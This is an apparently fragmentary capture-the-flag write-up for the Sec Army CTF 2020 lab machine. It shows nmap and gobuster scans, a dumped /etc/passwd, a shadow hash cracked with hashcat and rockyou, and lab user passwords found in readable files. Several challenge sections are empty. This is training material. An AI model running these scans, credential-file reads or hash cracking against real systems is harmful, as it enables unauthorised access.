Sec Army CTF 2020

NMAP

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-29 18:11 PKT
Stats: 0:00:07 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 33.33% done; ETC: 18:11 (0:00:12 remaining)
Nmap scan report for 192.168.1.5
Host is up (0.00012s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.1.7
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 2c:54:d0:5a:ae:b3:4f:5b:f8:65:5d:13:c9:ee:86:75 (RSA)
| 256 0c:2b:3a:bd:80:86:f8:6c:2f:9e:ec:e4:7d:ad:83:bf (ECDSA)
|_ 256 2b:4f:04:e0:e5:81:e4:4c:11:2f:92:2a:72:95:58:4e (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Totally Secure Website
MAC Address: 08:00:27:4D:91:E3 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Challenge 1 (Uno)

gobuster dir -u http://192.168.1.5:80 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Challenge 2 (Dos)

root:x:0:0:root:/root:/bin/bash                                           
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
uno:x:1001:1001:,,,:/home/uno:/bin/bash
dos:x:1002:1002:,,,:/home/dos:/bin/bash
tres:x:1003:1003:,,,:/home/tres:/bin/bash
cuatro:x:1004:1004:,,,:/home/cuatro:/bin/bash
cinco:x:1005:1005:,,,:/home/cinco:/bin/bash
seis:x:1006:1006:,,,:/home/seis:/bin/bash
siete:x:1007:1007:,,,:/home/siete:/bin/bash
ocho:x:1008:1008:,,,:/home/ocho:/bin/bash
nueve:x:1009:1009:,,,:/home/nueve:/bin/bash
ftp:x:108:113:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
cero:x:1000:1000:,,,:/home/cero:/bin/bash
dos@svos:~$ ls -la
total 180
drwx------ 7 dos dos 4096 Oct 19 19:46 .
drwxr-xr-x 12 root root 4096 Oct 19 11:05 ..
-rw-rw-r-- 1 dos dos 47 Oct 5 09:24 1337.txt
-rw-r--r-- 1 dos dos 220 Sep 22 11:36 .bash_logout
-rw-r--r-- 1 dos dos 3771 Sep 22 11:36 .bashrc
drwx------ 2 dos dos 4096 Sep 22 12:49 .cache
drwx------ 2 dos dos 4096 Sep 22 13:59 .elinks
drwxr-xr-x 2 dos dos 135168 Sep 27 14:51 files
drwx------ 3 dos dos 4096 Sep 22 12:49 .gnupg
drwxrwxr-x 3 dos dos 4096 Sep 22 13:24 .local
-rw-r--r-- 1 dos dos 807 Sep 22 11:36 .profile
-rw-rw-r-- 1 dos dos 104 Sep 23 09:52 readme.txt
dos@svos:~$ cat readme.txt
You are required to find the following string inside the files folder:
a8211ac1853a1235d48829414626512a
dos@svos:~$
UEsDBBQDAAAAADOiO1EAAAAAAAAAAAAAAAALAAAAY2hhbGxlbmdlMi9QSwMEFAMAAAgAFZI2Udrg
tPY+AAAAQQAAABQAAABjaGFsbGVuZ2UyL2ZsYWcyLnR4dHPOz0svSiwpzUksyczPK1bk4vJILUpV
L1aozC8tUihOTc7PS1FIy0lMB7LTc1PzSqzAPKNqMyOTRCPDWi4AUEsDBBQDAAAIADOiO1Eoztrt
dAAAAIEAAAATAAAAY2hhbGxlbmdlMi90b2RvLnR4dA3KOQ7CMBQFwJ5T/I4u8hrbdCk4AUjUXp4x
IsLIS8HtSTPVbPsodT4LvUanUYff6bHd7lcKcyzLQgUN506/Ohv1+cUhYsM47hufC0WL1WdIG4WH
80xYiZiDAg8mcpZNciu0itLBCJMYtOY6eKG8SjzzcPoDUEsBAj8DFAMAAAAAM6I7UQAAAAAAAAAA
AAAAAAsAJAAAAAAAAAAQgO1BAAAAAGNoYWxsZW5nZTIvCgAgAAAAAAABABgAgMoyJN2U1gGA6WpN
3pDWAYDKMiTdlNYBUEsBAj8DFAMAAAgAFZI2UdrgtPY+AAAAQQAAABQAJAAAAAAAAAAggKSBKQAA
AGNoYWxsZW5nZTIvZmxhZzIudHh0CgAgAAAAAAABABgAAOXQa96Q1gEA5dBr3pDWAQDl0GvekNYB
UEsBAj8DFAMAAAgAM6I7USjO2u10AAAAgQAAABMAJAAAAAAAAAAggKSBmQAAAGNoYWxsZW5nZTIv
dG9kby50eHQKACAAAAAAAAEAGACAyjIk3ZTWAYDKMiTdlNYBgMoyJN2U1gFQSwUGAAAAAAMAAwAo
AQAAPgEAAAAA
Although its total WASTE but... here's your super secret token: c8e6afe38c2ae9a0283ecfb4e1b7c10f7d96e54c39e727d0e5515ba24a4d1f1b

Challegne 3 (Tres)

dos@svos:~$ cat 1337.txt 
Our netcat application is too 1337 to handle..

Challenge 4 (Cuatro)

Challenge 5 (Cinco)

image-0 Hello
image-1 and
image-2 congrats
image-3 for
image-4 solving
image-5 this
image-6 challenge,
image-7 we
image-8 hope
image-9 that
image-10 you
image-11 enojoyed
image-12 the
image-13 challenges
image-14 we
image-15 presented
image-16 so
image-17 far.
image-18 It
image-19 is
image-20 time
image-21 for
image-22 us
image-23 to
image-24 increase
image-25 the
image-26 difficulty
image-27 level
image-28 and
image-29 make
image-30 the
image-31 upcoming
image-32 challenges
image-33 more
image-34 challenging
image-35 than
image-36 previous
image-37 ones.
image-38 Before
image-39 you
image-40 move
image-41 to
image-42 the
image-43 next
image-44 challenge,
image-45 here
image-46 are
image-47 the
image-48 credentials
image-49 for
image-50 the
image-51 5th
image-52 user
image-53 cinco:ruy70m35
image-54 head
image-55 over
image-56 to
image-57 this
image-58 user
image-59 and
image-60 get
image-61 your
image-62 5th
image-63 flag!
image-64 goodluck
cinco@svos:~$ cat readme.txt 
Check for Cinco's secret place somewhere outside the house
cinco@svos:~$
seis:$6$MCzqLn0Z2KB3X3TM$opQCwc/JkRGzfOg/WTve8X/zSQLwVf98I.RisZCFo0mTQzpvc5zqm/0OJ5k.PITcFJBnsn7Nu2qeFP8zkBwx7.:18532:0:99999:7:::
hashcat -a 0 -m 1800 -o cracked.txt hash /usr/share/wordlists/rockyou.tx

Challenge 6 (Seis)

Challenge 7 (Siete)

/var/www/html/shellcmsdashboard
$ cat readme9213.txt
cat: readme9213.txt: Permission denied
$ ls -la
total 24
drwxrwxrwx 2 root root 4096 Oct 18 15:02 .
drwxr-xr-x 5 root root 4096 Oct 8 17:51 ..
-rwxrwxrwx 1 root root 1459 Oct 1 17:57 aabbzzee.php
-rwxrwxrwx 1 root root 1546 Oct 18 15:02 index.php
--wx-wx-wx 1 www-data root 48 Oct 8 17:54 readme9213.txt
-rwxrwxrwx 1 root root 58 Oct 1 17:37 robots.txt
$ chmod u=rwx readme9213.txt
$ cat readme9213.txt
password for the seventh user is 6u1l3rm0p3n473
$

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store